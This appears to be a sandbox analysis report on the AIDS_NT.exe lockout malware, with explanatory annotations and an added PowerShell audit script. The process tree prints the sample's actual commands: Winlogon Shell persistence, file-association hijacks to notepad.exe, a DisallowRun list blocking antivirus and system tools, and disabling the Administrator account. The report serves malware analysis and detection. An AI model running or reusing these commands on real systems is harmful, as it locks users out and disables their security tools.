Analysis
max time kernel: 117s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 21-05-2022 10:35

Static task: static1
Behavioral task behavioral1: sample AIDS_NT.exe, resource win7-20220414-en
Behavioral task behavioral2: sample AIDS_NT.exe, resource win10v2004-20220414-en (the run this report describes, per the platform and resource above)
General
Target: AIDS_NT.exe
Size: 924KB
MD5: 14eefb80a0813abbf8710387a5383f08
SHA1: d3fa355cc1d184be20b441143fa34e4ae1a4bdb2
SHA256: 61ee3bd82bed03dd0f3fb9bc9b76b7da972a90d3c12c8e4d5e967440a2f04c00
SHA512: a3174a80c47a02b6deed6eb390a999fa486f7a4cda7ab614d93589f614a60ba500aa8f42346e80cc53b7e1a5af0f0e515e4b014d23e5af90fabeae504f43f130
Malware Config
Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Windows\\AIDS_NT_Instructions.txt, C:\\Windows\\aids.bat, C:\\Windows\\42.exe, C:\\Windows\\1.bat" | reg.exe
Winlogon starts every comma-separated entry of the Shell value at logon, so keeping explorer.exe first gives the user a normal desktop while the instructions file, the two batch files and 42.exe are started beside it. Note the key path: the 32-bit C:\Windows\SysWOW64\reg.exe seen in the process tree below targeted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, and WOW64 registry redirection placed the value under WOW6432Node. The native Winlogon key, which the 64-bit winlogon.exe reads, is not among the IoCs, so on this x64 run only the 32-bit view was changed. A host check must read both views.

Modifies system executable filetype association 2 TTPs 4 IoCs
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "notepad.exe" | reg.exe
The stock default value of exefile\shell\open\command is "%1" %*; replacing it with notepad.exe makes the shell open any .exe or .com in Notepad instead of running it. Unlike the Winlogon write, this path carries no WOW6432Node component: these ProgID keys are shared between the 32- and 64-bit views, so the change applies to both. Programs started without going through the shell association (a service, a scheduled task, a direct CreateProcess call, a name typed at a command prompt) are unaffected.

Blocks application from running via registry modification
Adds application to list of disallowed applications.
The DisallowRun policy (HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value DisallowRun = 1, with the blocked image names as values under the DisallowRun subkey) is enforced by Explorer only for programs launched through the shell, such as from the Start menu or by double-click. Programs started from a command prompt, a scheduled task or a service are not blocked, and the list applies only to the user whose hive it is written to. The full list the sample writes is in the process tree below.

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Disables use of System Restore points 1 TTPs
Executes dropped EXE 1 IoCs
pid | process
1688 | nircmd.exe
nircmd.exe is NirSoft's NirCmd command-line utility; here it is used only to hide the console window of the cmd.exe running the batch file (see the process tree below). The RarSFX0 temporary directory it is dropped into shows that AIDS_NT.exe is a WinRAR self-extracting archive whose payload includes at least start.bat, PkgMgr.bat, 42.exe and nircmd.exe.

YARA rule matches
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\42.exe | upx
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe | upx
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe | upx
Both dropped executables are UPX-packed. 42.exe is not launched anywhere in the process tree as shown; it is only copied to C:\Windows and registered in the Winlogon Shell value, so its own behaviour is not covered by this report.
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | AIDS_NT.exe
The query is attributed to the SFX stub process itself, not to the batch files, and nothing else in the report depends on its result; treat the geofence label as the sandbox's heuristic rather than confirmed behaviour.
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\1.jpg" | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\1.jpg" | reg.exe
Drops file in Windows directory 12 IoCs
description | ioc | process
File opened for modification | C:\Windows\42.exe | cmd.exe
File created | C:\Windows\1.jpg | cmd.exe
File opened for modification | C:\Windows\nircmd.exe | cmd.exe
File created | C:\Windows\AIDS_NT_Instructions.txt | cmd.exe
File opened for modification | C:\Windows\AIDS_NT_Instructions.txt | cmd.exe
File created | C:\Windows\nircmd.exe | cmd.exe
File created | C:\Windows\aids.bat | cmd.exe
File created | C:\Windows\1.bat | cmd.exe
File opened for modification | C:\Windows\1.bat | cmd.exe
File created | C:\Windows\42.exe | cmd.exe
File opened for modification | C:\Windows\1.jpg | cmd.exe
File opened for modification | C:\Windows\aids.bat | cmd.exe
Writing to C:\Windows and to HKLM requires administrative rights; the recorded writes succeeded, so the sample ran elevated as the sandbox's Admin user. Under a standard user account the start.bat and PkgMgr.bat steps that touch HKLM and C:\Windows fail, and only the HKCU policy and wallpaper changes would apply.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
The report records no file encryption. What it does record is lockout and sabotage: the shell replacement, the file-type hijack, the disabled tools and Administrator account, and an instructions text file opened at every logon through the Winlogon Shell value.
Modifies data under HKEY_USERS 15 IoCs
All fifteen entries are theme and DWM colour values that LogonUI.exe writes under the .DEFAULT (logon screen) hive when the logon screen is shown, consistent with the shutdown.exe activity recorded under AdjustPrivilegeToken below. This is ordinary logon-screen activity, not something the sample wrote.
description | ioc | process
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "13" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
Modifies registry class 64 IoCs
The sample points the shell\open\command of many ProgIDs (documents, images, audio and video, archives, scripts, DLLs, control panel applets) at notepad.exe, the same hijack applied to exefile and comfile above. The report shows at most 64 IoCs per signature, so the real set of affected ProgIDs is larger than this list; a host check should scan HKLM\SOFTWARE\Classes for any open command equal to notepad.exe rather than rely on these names.
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\isofile\shell\open | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "notepad.exe" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell\open\command | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ctfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\logfile\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\hfile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\pptfile\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile\shell\open\command | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\shell\open | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\asmfile\shell\open | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\oggfile | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\avifile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpgfile\shell\open\command\ = "notepad.exe" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\dmgfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\isofile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\cabfile | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\docfile\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\cfgfile\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\pdffile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\isofile | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\asmfile\shell\open\command | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\bmpfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\cfgfile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ctfile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\logfile\shell\open | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mkvfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile\shell | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\csvfile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\oggfile\shell\open | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\docfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\binfile\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\open | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile\shell\open | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\asmfile | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\shell\open | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7zfile\shell\open\command | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\binfile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\bmpfile\shell\open | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\xlsxfile\shell\open\command | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell\open | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\gzfile | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\cabfile\shell\open\command\ = "notepad.exe" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\cplfile\shell\open\command\ = "notepad.exe" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open\Command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "notepad.exe" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\cppfile\shell\open | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell\open | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\zipfile | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\rarfile | reg.exe
Runs net.exe
The call is net user Администратор /active:no (see the process tree below), which disables the built-in Administrator account on a Russian-localised installation.

Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | process
Token: SeSecurityPrivilege | 3944 | AIDS_NT.exe
Token: SeRestorePrivilege | 3944 | AIDS_NT.exe
Token: SeShutdownPrivilege | 2164 | shutdown.exe
Token: SeRemoteShutdownPrivilege | 2164 | shutdown.exe
shutdown.exe (PID 2164) does not appear in the process tree as shown below, which stops inside the DisallowRun list; its presence here with the shutdown privileges enabled indicates that the batch files end by shutting down or restarting the machine.

Suspicious use of SetWindowsHookEx 1 IoCs
pid | process
4616 | LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs
Each row below collapses the identical repeated entries of the report. The sandbox logs three writes for every parent/child pair; that is the pattern it records for ordinary process creation (the parent populating the new child's address space before it starts), not injection into an unrelated process. PID 2364 is the cmd.exe running start.bat and PID 5052 the one running PkgMgr.bat. The listing is capped at 64 entries.
source pid process | target pid process | entries
3944 AIDS_NT.exe | 2364 cmd.exe | 3
2364 cmd.exe | 2276 reg.exe | 3
2364 cmd.exe | 5104 reg.exe | 3
2364 cmd.exe | 2252 reg.exe | 3
3944 AIDS_NT.exe | 5052 cmd.exe | 3
5052 cmd.exe | 1688 nircmd.exe | 3
5052 cmd.exe | 4764 attrib.exe | 3
5052 cmd.exe | 4556 net.exe | 3
4556 net.exe | 4408 net1.exe | 3
5052 cmd.exe | 4612 reg.exe | 3
5052 cmd.exe | 760 reg.exe | 3
5052 cmd.exe | 1416 reg.exe | 3
5052 cmd.exe | 5028 reg.exe | 3
5052 cmd.exe | 4432 reg.exe | 3
5052 cmd.exe | 4020 reg.exe | 3
5052 cmd.exe | 1912 reg.exe | 3
5052 cmd.exe | 640 reg.exe | 3
5052 cmd.exe | 4616 reg.exe | 3
5052 cmd.exe | 4656 reg.exe | 3
5052 cmd.exe | 260 reg.exe | 3
5052 cmd.exe | 116 reg.exe | 3
5052 cmd.exe | 4536 reg.exe | 1 (cut off by the 64-entry cap)

Views/modifies file attributes 1 TTPs 1 IoCs
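The following PowerShell script is an added example and is not part of the sandbox report or of the sample. It audits a host for the indicators listed in the Signatures section: it reads both the native and the WOW6432Node registry views for the Winlogon shell (the report shows the sample's write redirected into the latter), scans every ProgID under HKLM\SOFTWARE\Classes for an open command of notepad.exe instead of trusting the truncated 64-entry list, and walks every loaded user hive under HKEY_USERS rather than only HKCU, since the responder is often not the user who ran the sample. The value names used for the RegEdit, Task Manager and System Restore policies (DisableRegistryTools, DisableTaskMgr, DisableSR, DisableConfig) are the standard ones and are an assumption: the report does not print them.

```powershell
# Added example (not part of the sandbox report): audit a host for the indicators
# listed in the Signatures section. Run from an elevated, 64-bit PowerShell session.
# Assumption: the RegEdit / Task Manager / System Restore policy value names are the
# standard DisableRegistryTools, DisableTaskMgr,, DisableSR and DisableConfig; the report
# does not print which of them the sample set.

$findings = [System.Collections.Generic.List[string]]::new()

function Test-RegValue {
    # Record a finding when value $Name under $Path exists and differs from $Expected.
    # $Name '' addresses the key's (Default) value. A missing key or value is silent:
    # for the WOW6432Node Winlogon view and for policy values, absence is the clean state.
    param([string]$Path, [string]$Name, [string]$Expected, [string]$Label)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $data = (Get-Item -LiteralPath $Path).GetValue($Name, $null)
    if ($null -eq $data) { return }
    if ([string]$data -ne $Expected) {
        $shown = if ($Name) { $Name } else { '(Default)' }
        $findings.Add("$Label : $Path\$shown = '$data' (expected '$Expected')")
    }
}

# Machine-wide keys. The report shows the 32-bit reg.exe write to Winlogon\Shell
# redirected into WOW6432Node, so both views are checked. ProgIDs under
# HKLM\SOFTWARE\Classes and the Policies keys are shared between the views.
foreach ($view in 'SOFTWARE', 'SOFTWARE\WOW6432Node') {
    Test-RegValue "HKLM:\$view\Microsoft\Windows NT\CurrentVersion\Winlogon" 'Shell' 'explorer.exe' "Winlogon Shell [$view]"
}
foreach ($progId in 'exefile', 'comfile') {
    Test-RegValue "HKLM:\SOFTWARE\Classes\$progId\shell\open\command" '' '"%1" %*' "$progId open command"
}
Test-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' 'HideFastUserSwitching' '0' 'Fast user switching policy'
foreach ($v in 'DisableSR', 'DisableConfig') {   # assumed names, see header comment
    Test-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore' $v '0' 'System Restore policy'
}

# Every ProgID whose open command is notepad.exe. The report lists 64 such keys and is
# cut off there, so the names it shows are not a complete list.
Get-ChildItem -LiteralPath 'HKLM:\SOFTWARE\Classes' -ErrorAction SilentlyContinue | ForEach-Object {
    $cmdKey = "$($_.PSPath)\shell\open\command"
    if ((Test-Path -LiteralPath $cmdKey) -and
        ((Get-Item -LiteralPath $cmdKey).GetValue('', $null) -eq 'notepad.exe')) {
        $findings.Add("ProgID hijack: $($_.PSChildName)\shell\open\command = 'notepad.exe'")
    }
}

# Per-user keys: every loaded profile hive, because the audit may run as a different
# user than the one who ran the sample (whose SID the report shows as ...-1000).
Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |
    ForEach-Object {
        $sid  = $_.PSChildName
        $hive = "Registry::HKEY_USERS\$sid"
        Test-RegValue "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" 'DisallowRun' '0' "DisallowRun policy [$sid]"
        Test-RegValue "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\System" 'DisableRegistryTools' '0' "RegEdit policy [$sid]"
        Test-RegValue "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\System" 'DisableTaskMgr' '0' "Task Manager policy [$sid]"
        # The blocked image names live as values under the DisallowRun subkey.
        $dr = "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun"
        if (Test-Path -LiteralPath $dr) {
            $key = Get-Item -LiteralPath $dr
            foreach ($n in $key.GetValueNames()) {
                $findings.Add("DisallowRun entry [$sid]: $n = '$($key.GetValue($n))'")
            }
        }
        # Only the sample's own wallpaper path is flagged, to stay quiet on clean hosts.
        $desk = Get-Item -LiteralPath "$hive\Control Panel\Desktop" -ErrorAction SilentlyContinue
        if ($desk -and $desk.GetValue('Wallpaper', '') -eq 'C:\Windows\1.jpg') {
            $findings.Add("Wallpaper [$sid] = 'C:\Windows\1.jpg'")
        }
    }

# Files the batch scripts dropped into C:\Windows (PkgMgr.bat was given +h +s +r).
foreach ($name in 'AIDS_NT_Instructions.txt', 'aids.bat', '1.bat', '42.exe', '1.jpg', 'nircmd.exe', 'PkgMgr.bat') {
    if (Test-Path -LiteralPath "C:\Windows\$name" -PathType Leaf) { $findings.Add("Dropped file: C:\Windows\$name") }
}

# The built-in Administrator (RID 500) that "net user Администратор /active:no" targets.
# Disabled is also the default on client Windows, so weigh this with the other findings.
$builtin = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }
if ($builtin -and -not $builtin.Enabled) { $findings.Add("Built-in Administrator '$($builtin.Name)' is disabled") }

if ($findings.Count -eq 0) { 'No AIDS_NT indicators found.' } else { $findings | ForEach-Object { "[!] $_" } }
```

Run it elevated from a 64-bit PowerShell; from a 32-bit session the HKLM:\SOFTWARE paths would themselves be redirected and the native Winlogon view would never be read. The script reports rather than repairs, so it is safe to run on a host whose state is still unknown.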
Processes
Each entry gives the tree depth, the image path and, on the next line, the command line; the lines beginning with "- " are the signatures the sandbox attached to that process. Two things to read off this tree. First, the SFX stub is 32-bit: it asks for C:\Windows\system32\cmd.exe and WOW64 file-system redirection resolves that to C:\Windows\SysWOW64\cmd.exe, so every descendant (reg.exe, net.exe, attrib.exe) is also 32-bit, which is why the Winlogon write in the Signatures above landed in WOW6432Node while the HKEY_CURRENT_USER and HKLM\SOFTWARE\Classes writes were not redirected. Second, the account name in the net user command is Администратор, the Russian-localised name of the built-in Administrator account; the command only succeeds on an installation where an account by that name exists, which is not the case on this en-US image.

1 C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe
  "C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe"
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  2 C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat" "
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    3 C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell
      - Modifies WinLogon for persistence
      (REG ADD with /v but no /d writes the value with empty data; the next call supplies the list.)
    3 C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell /d "explorer.exe, C:\Windows\AIDS_NT_Instructions.txt, C:\Windows\aids.bat, C:\Windows\42.exe, C:\Windows\1.bat"
      - Modifies WinLogon for persistence
    3 C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f
      - Sets desktop wallpaper using registry
  2 C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.bat" "
    - Suspicious use of WriteProcessMemory
    3 C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe
      nircmd win hide title "C:\Windows\system32\cmd.exe"
      - Executes dropped EXE
    3 C:\Windows\SysWOW64\attrib.exe
      attrib C:\Windows\PkgMgr.bat +h +s +a +r
      - Views/modifies file attributes
      (C:\Windows\PkgMgr.bat is not among the dropped files recorded above, so this call may have targeted a file that was not there.)
    3 C:\Windows\SysWOW64\net.exe
      net user Администратор /active:no
      - Suspicious use of WriteProcessMemory
      4 C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user Администратор /active:no
    3 C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v HideFastUserSwitching /t REG_DWORD /d "1"
    3 C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun"
    3 C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /f /v "DisallowRun" /t REG_DWORD /d "1"
    3 C:\Windows\SysWOW64\reg.exe, one process per entry below (99 entries are shown before the listing ends)
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "<n>" /t REG_SZ /d "<program>" /f
      Entries as value name: program. The /d arguments are reproduced as written; several end in a space inside the quotes, and since Explorer compares the image file name those entries may not match anything.
      1: "MSASCui.exe"
      2: "msmpeng.exe"
      3: "msdt.exe"
      4: "ProcessHacker.exe"
      5: "spideragent.exe "
      6: "SbieSvc.exe "
      7: "SearchUI.exe "
      8: "dwscanner.exe"
      9: "aswEngSrv.exe"
      10: "AvastSvc.exe"
      11: "AvastUI.exe"
      12: "AvastBrowserCrashHandler.exe"
      13: "chrome.exe"
      14: "VirtualBox.exe"
      15: "CCleaner64.exe"
      16: "CCleaner32.exe"
      17: "CCleaner86.exe"
      18: "CCleaner.exe"
      19: "firefox.exe"
      20: "taskmgr.exe"
      21: "opera.exe"
      22: "iexplore.exe"
      23: "perfmon.exe"
      24: "msconfig.exe"
      25: "WUDFHost.exe"
      26: "msconfig.exe"
      27: "SecurityHealthSystray.exe"
      28: "rstrui.exe"
      29: "mcapexe.exe"
      30: "McCSPServiceHost.exe "
      31: "McInstruTrack.exe"
      32: "McPvTray.exe "
      33: "mcshield.exe "
      34: "McUICnt.exe "
      35: "MfeAVSvc.exe "
      36: "mfefire.exe "
      37: "mfevtps.exe "
      38: "MMSSHOST.exe "
      39: "ModuleCoreService.exe"
      40: "control.exe"
      41: "avp.exe "
      42: "avpui.exe "
      43: "kav.exe"
      44: "vmware.exe"
      45: "msinfo32.exe"
      46: "RecoveryDrive.exe"
      47: "dwscanner.exe"
      48: "spideragent.exe"
      49: "uTorrent.exe"
      50: "firefox.exe"
      51: "regedt32.exe"
      52: "resmon.exe"
      53: "Defender.exe "
      54: "DefenderDaemon.exe"
      55: "mbam.exe"
      56: "mbamtray.exe"
      57: "MBAMWsc.exe"
      58: "mbuns.exe"
      59: "MbamPt.exe"
      60: "MBAMService.exe"
      61: "assistant.exe"
      62: "malwarebytes_assistant.exe"
      63: "ig.exe"
      64: "browser.exe"
      65: "am800.exe"
      66: "TOTALCMD64.EXE"
      67: "TOTALCMD32.EXE"
      68: "TOTALCMD86.EXE"
      69: "WatchDog.exe"
      70: "ProductAgentUI.exe"
      71: "ProductAgentService.exe"
      72: "DiscoverySrv.exe"
      73: "BDSubWiz.exe"
      74: "bdreinit.exe"
      75: "agentpackage.exe"
      76: "setuppackage.exe"
      77: "7zFM.exe"
      78: "procexp64.exe"
      79: "procexp.exe"
      80: "WinRAR.exe"
      81: "BdVpnService.exe "
      82: "BdVpnApp.exe "
      83: "bdservicehost.exe"
      84: "bdagent.exe"
      85: "bdredline.exe"
      86: "ekrn.exe "
      87: "eguiProxy.exe"
      88: "egui.exe"
      89: "AvastNM.exe"
      90: "AVGBrowserCrashHandler.exe"
      91: "AVGBrowserCrashHandler64.exe"
      92: "AVGUI.exe"
      93: "AVGSvc.exe"
      94: "aswEngSrv.exe"
      95: "wsc_proxy.exe"
      96: "am807.exe"
      97: "artmoney.exe"
      98: "chemax.exe"
      99: "Cheat Engine.exe"
